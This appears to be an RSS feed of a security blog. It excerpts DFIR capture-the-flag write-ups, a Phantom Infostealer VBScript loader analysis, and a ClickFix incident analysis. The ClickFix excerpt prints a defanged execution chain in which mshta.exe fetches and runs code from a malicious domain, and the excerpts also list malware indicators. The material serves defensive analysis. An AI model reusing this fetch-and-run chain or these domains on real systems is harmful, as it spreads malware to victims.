https://p0peye-blog.pages.dev/posts/Recent content in Posts on Ahmad Massd — Security BlogHugo -- gohugo.ioenahmad.massad.ir@gmail.com (Ahmad Massad)ahmad.massad.ir@gmail.com (Ahmad Massad)© 2026 Ahmad MassadWed, 20 Aug 2025 00:00:00 +0000https://p0peye-blog.pages.dev/posts/aliens-ctf-dfir/Wed, 20 Aug 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/aliens-ctf-dfir/<h2 class="relative group">Challenge: 7 Oct <div id="challenge-7-oct" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#challenge-7-oct" aria-label="Anchor">#</a> </span> </h2> <h3 class="relative group">Description <div id="description" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#description" aria-label="Anchor">#</a> </span> </h3> <blockquote><p>We stormed one of the enemy&rsquo;s concentration areas and after completing the operation, we took some devices to investigate and obtain intelligence. One device belongs to a leader. We believe information is being leaked through a spy. Search the device to find the spy and location details — the enemy was planning a prisoner recovery operation and location information had been leaked to them.</p>https://p0peye-blog.pages.dev/posts/cyber-warriors-ctf-nashmi-apt/Sat, 16 Aug 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/cyber-warriors-ctf-nashmi-apt/<p><figure><img class="my-0 rounded-md" loading="lazy" decoding="async" fetchpriority="low" alt="" src="https://miro.medium.com/v2/resize:fit:700/1*xmjWlgRCiaWpY7CiFRfAHg.png" ></figure> </p> <h2 class="relative group">Introduction <div id="introduction" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#introduction" aria-label="Anchor">#</a> </span> </h2> <p>Our Security Operations Center (SOC) detected suspicious activity originating from an internal employee workstation. The employee — a finance team member — reported slow system performance and unexpected behavior. Shortly after, EDR logs showed signs of malware persistence and suspicious outbound traffic.</p> <p><strong>Mission:</strong> Analyze a full memory image of the compromised machine, identify the scope of the infection, and answer key investigation questions.</p>https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/Thu, 10 Jul 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/<p><figure><img class="my-0 rounded-md" loading="lazy" decoding="async" fetchpriority="auto" alt="Phantom Stealer" width="1920" height="1080" src="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_5ce0c37a8458b04f.png" srcset="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_5ce0c37a8458b04f.png 800w, https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_3c426dc241b76d8d.png 1280w" sizes="(min-width: 768px) 50vw, 65vw" data-zoom-src="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image.png"></figure> </p> <h2 class="relative group">Overview <div id="overview" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#overview" aria-label="Anchor">#</a> </span> </h2> <p>Analysis of a malicious VBScript file (<code>LPO_337860.vbs.bin</code>) acting as a loader for <strong>Phantom Infostealer</strong>. The script employs heavy obfuscation, environmental checks, and persistence mechanisms.</p> <p><strong>Sample Information</strong></p> <table> <thead> <tr> <th>Field</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Filename</td> <td><code>LPO_337860.vbs.bin</code></td> </tr> <tr> <td>MD5</td> <td><code>074a04eafe704a893655025b80beffb6</code></td> </tr> <tr> <td>File Type</td> <td>VBScript</td> </tr> <tr> <td>Threat</td> <td>Phantom Infostealer Loader</td> </tr> </tbody> </table> <hr> <h2 class="relative group">Stage 0 — VBScript Loader (<code>LPO_337860.vbs.bin</code>) <div id="stage-0--vbscript-loader-lpo_337860vbsbin" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#stage-0--vbscript-loader-lpo_337860vbsbin" aria-label="Anchor">#</a> </span> </h2> <p>The initial VBScript acts as a <strong>deobfuscation and file-dropping engine</strong> in two steps:</p>https://p0peye-blog.pages.dev/posts/purematrixa-clickfix-analysis/Tue, 01 Jul 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/purematrixa-clickfix-analysis/<h2 class="relative group">Incident Overview <div id="incident-overview" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#incident-overview" aria-label="Anchor">#</a> </span> </h2> <p>While conducting a threat hunting deep dive into a resolved <strong>ClickFix</strong> incident, I tracked the infection chain back to the landing domain <code>turbowave45[.]com</code>. The original execution chain on the target Windows workstation was highly indicative of a modern social engineering / fake update lure:</p> <div class="highlight-wrapper"><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>chrome.exe → explorer.exe → powershell.exe → mshta.exe https://purematrixa[.]com/1751517</span></span></code></pre></div></div> <p>The EDR flagged and killed the process at:</p>